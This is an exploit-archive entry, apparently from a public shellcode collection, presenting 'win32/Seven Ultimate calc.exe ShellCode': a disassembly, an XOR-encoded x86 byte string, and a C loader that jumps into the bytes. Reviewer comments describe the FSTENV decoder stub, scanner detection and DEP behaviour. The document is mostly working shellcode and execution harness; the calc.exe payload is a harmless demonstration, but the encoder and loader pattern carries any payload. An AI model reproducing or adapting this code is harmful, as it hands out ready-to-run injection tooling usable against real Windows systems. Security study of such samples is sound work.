win32/Seven Ultimate calc.exe ShellCode



EKU-ID: 2281 CVE: OSVDB-ID:
Author: Ayrbyte Published: 2012-06-11 Verified: Verified

/*
    title : win32/Seven Ultimate calc.exe ShellCode
    Author: Ayrbyte
    Link : -
    Version: -
    Category: local
    Tested on: Windows 7 Ultimate
    Code : c++

(disassembly code)

00401B62     DBD7           FCMOVNBE ST,ST(7)
00401B64     D97424 F4      FSTENV (28-BYTE) PTR SS:[ESP-C]
00401B68     B8 79C464B7    MOV EAX,B764C479
00401B6D     33C9           XOR ECX,ECX
00401B6F     B1 38          MOV CL,38
00401B71     5D             POP EBP
00401B72     83C5 04        ADD EBP,4
00401B75     3145 13        XOR DWORD PTR SS:[EBP+13],EAX
00401B78     033CD7         ADD EDI,DWORD PTR DS:[EDI+EDX*8]
00401B7B     8642 42        XCHG BYTE PTR DS:[EDX+42],AL
00401B7E     3F             AAS
00401B7F     CF             IRETD
00401B80     AD             LODS DWORD PTR DS:[ESI]
00401B81     BA C0B0245F    MOV EDX,5F24B0C0
00401B86     F1             INT1
00401B87     E2 53          LOOPD SHORT test.00401BDC
00401B89     14 A0          ADC AL,0A0
00401B8B     3217           XOR DL,BYTE PTR DS:[EDI]
00401B8D     78 49          JS SHORT test.00401BD8
00401B8F     B8 7568DACC    MOV EAX,CCDA6875
00401B94     51             PUSH ECX
00401B95     9F             LAHF
00401B96     6B7A 84 AE     IMUL EDI,DWORD PTR DS:[EDX-7C],-52
00401B9A     6C             INS BYTE PTR ES:[EDI],DX                 ;  I/O command
00401B9B     4A             DEC EDX
00401B9C     087CAE CC      OR BYTE PTR DS:[ESI+EBP*4-34],BH
00401BA0     F4             HLT                                      ;  Privileged command
00401BA1    ^7E E3          JLE SHORT test.00401B86
00401BA3     2E:C4B1 F62F01>LES ESI,FWORD PTR CS:[ECX+AF012FF6]      ;  Modification of segment register
00401BAA     F9             STC
00401BAB     62DA           BOUND EBX,EDX                            ;  Illegal use of register
00401BAD     A4             MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
00401BAE     A8 92          TEST AL,92
00401BB0     6F             OUTS DX,DWORD PTR ES:[EDI]               ;  I/O command
00401BB1     F8             CLC
00401BB2    ^70 92          JO SHORT test.00401B46
00401BB4     BF 77C8ECBA    MOV EDI,BAECC877
00401BB9     47             INC EDI
00401BBA     BD 46C4976E    MOV EBP,6E97C446
00401BBF     DC8E 0F04BA2E  FMUL QWORD PTR DS:[ESI+2EBA040F]
00401BC5     2E:C9          LEAVE                                    ;  Superfluous prefix
00401BC7     D813           FCOM DWORD PTR DS:[EBX]
00401BC9     79 66          JNS SHORT test.00401C31
00401BCB     2AE7           SUB AH,BH
00401BCD    ^78 AE          JS SHORT test.00401B7D
00401BCF     6208           BOUND ECX,QWORD PTR DS:[EAX]
00401BD1     4B             DEC EBX
00401BD2     8E29           MOV GS,WORD PTR DS:[ECX]                 ;  Modification of segment register
00401BD4     37             AAA
00401BD5     64:0333        ADD ESI,DWORD PTR FS:[EBX]
00401BD8     7F 42          JG SHORT test.00401C1C
00401BDA     FC             CLD
00401BDB     46             INC ESI
00401BDC     8BB1 815048C8  MOV ESI,DWORD PTR DS:[ECX+C8485081]
00401BE2     5D             POP EBP
00401BE3     D4 4D          AAM 4D
00401BE5     6A 15          PUSH 15
00401BE7     4E             DEC ESI
00401BE8     B6 8B          MOV DH,8B
00401BEA     FA             CLI
00401BEB     093D 87B75E19  OR DWORD PTR DS:[195EB787],EDI
00401BF1     8B46 B2        MOV EAX,DWORD PTR DS:[ESI-4E]
00401BF4     11B7 C335F63E  ADC DWORD PTR DS:[EDI+3EF635C3],ESI
00401BFA     97             XCHG EAX,EDI
00401BFB     11D2           ADC EDX,EDX
00401BFD     1B43 3B        SBB EAX,DWORD PTR DS:[EBX+3B]
00401C00     43             INC EBX
00401C01     C122 44        SHL DWORD PTR DS:[EDX],44                ;  Shift constant out of range 1..31
00401C04     93             XCHG EAX,EBX
00401C05     AD             LODS DWORD PTR DS:[ESI]
00401C06     9B             WAIT
00401C07    ^E0 DF          LOOPDNE SHORT test.00401BE8
00401C09     5F             POP EDI
00401C0A     CF             IRETD
00401C0B     93             XCHG EAX,EBX
00401C0C     BD 350E11B8    MOV EBP,B8110E35
00401C11     70 10          JO SHORT test.00401C23
00401C13     29C3           SUB EBX,EAX
00401C15     D279 18        SAR BYTE PTR DS:[ECX+18],CL
00401C18     48             DEC EAX
00401C19     BD FEA59BFA    MOV EBP,FA9BA5FE
00401C1E     F1             INT1
00401C1F     EF             OUT DX,EAX                               ;  I/O command
00401C20     86AA 99A952EF  XCHG BYTE PTR DS:[EDX+EF52A999],CH
00401C26     C7             ???                                      ;  Unknown command
00401C27     49             DEC ECX
00401C28     8933           MOV DWORD PTR DS:[EBX],ESI
00401C2A     FEC9           DEC CL
00401C2C     38CB           CMP BL,CL
00401C2E     05 D148CE42    ADD EAX,42CE48D1
00401C33     55             PUSH EBP
00401C34     A0 A2DB30C6    MOV AL,BYTE PTR DS:[C630DBA2]
00401C39     11DB           ADC EBX,EBX
00401C3B     10A5 AF7FCC43  ADC BYTE PTR SS:[EBP+43CC7FAF],AH
00401C41     A1 1B9DE44E    MOV EAX,DWORD PTR DS:[4EE49D1B]
00401C46     B8 3272C334    MOV EAX,34C37232
00401C4B     D0E9           SHR CL,1
00401C4D     1087 4691378B  ADC BYTE PTR DS:[EDI+8B379146],AL
00401C53     15 7BD22BBF    ADC EAX,BF2BD27B
00401C58     8300 00        ADD DWORD PTR DS:[EAX],0
*/

#include <windows.h>
/*
 * Encoded x86 payload: 247 bytes of string literal plus the implicit
 * trailing NUL (that NUL is apparently what the listing's final
 * "ADD DWORD PTR [EAX],0" at 00401C58 swallows, together with whatever
 * byte happened to follow the array in memory).
 *
 * Only the first few instructions of the listing above are meaningful:
 * FSTENV [ESP-C] followed by POP EBP recovers the current instruction
 * address, EAX is loaded with a 32-bit key, CL with a counter, and
 * XOR DWORD PTR [EBP+13],EAX begins rewriting the bytes that follow in
 * place.  Everything from the "ADD EDI,..." line onward is still encoded
 * when the disassembler sees it, so that part of the listing is noise.
 *
 * NOTE(review): the FSTENV-derived address plus an in-place XOR loop is
 * the pattern emulation-based scanners key on; a static signature over
 * the raw bytes below would only match this particular key/encoding.
 * The array is not const because the stub writes back into it, which is
 * also why it lives in a writable section (see main()).
 */
char string[] =
"\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83";
/*
 * Entry point: reinterpret the address of the global byte array as a
 * function pointer and jump into it.  Nothing is returned from the
 * payload; if it does come back, the process exits normally.
 *
 * NOTE(review): the array sits in a writable data section.  On a build
 * or host where that section is non-executable (DEP/NX), the indirect
 * call faults on the first fetch instead of running the bytes -- which is
 * exactly the mitigation this pattern trips, and a good place to expect
 * an access-violation crash report rather than a calc.exe launch.
 * Casting an object pointer to a function pointer is not portable C.
 */
int main(void)
{
    void (*entry)(void) = (void (*)(void))string;
    entry();
    return 0;
}